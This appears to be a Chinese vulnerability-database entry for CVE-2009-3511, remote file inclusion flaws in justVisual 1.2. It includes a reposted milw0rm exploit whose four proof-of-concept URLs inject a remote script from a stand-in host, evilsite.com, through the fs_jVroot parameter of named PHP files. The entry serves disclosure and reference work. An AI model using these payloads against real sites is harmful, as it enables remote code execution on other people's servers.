fh54 justvisual 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118219 漏洞类型 代码注入
发布时间 2009-07-30 更新时间 2009-07-30
CVE编号 CVE-2009-3511 CNNVD-ID CNNVD-200910-102
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/9308
https://www.securityfocus.com/bid/42542
https://cxsecurity.com/issue/WLB-2009100064
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-102
|漏洞详情
justVisual1.2版本中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)sites/site/pages/index.php,(2)sites/test/pages/contact.php,(3)system/pageTemplate.php和(4)system/utilities.php的fs_jVroot参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
##################################################################################################################
[+] justVisual 1.2 (fs_jVroot) Remote File Inclusion Vulnerabilities
[+] Discovered By SirGod
[+] http://insecurity-ro.org
[+] http://h4cky0u.org
##################################################################################################################

[+] Download : http://www.fh54.de/justVisual/justVisual_1.2.zip

[+] Remote File Inclusion

 - Vulnerable code is everywhere

 - PoC's

   http://127.0.0.1/path/justVisual/sites/site/pages/index.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/sites/test/pages/contact.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/pageTemplate.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

   http://127.0.0.1/path/justVisual/system/utilities.php?fs_jVroot=http://evilsite.com/evilscript.txt%00

##################################################################################################################

# milw0rm.com [2009-07-30]
|受影响的产品
Free Web Tools and Services justVisual 1.2
|参考资料

来源:MILW0RM
名称:9308
链接:http://www.milw0rm.com/exploits/9308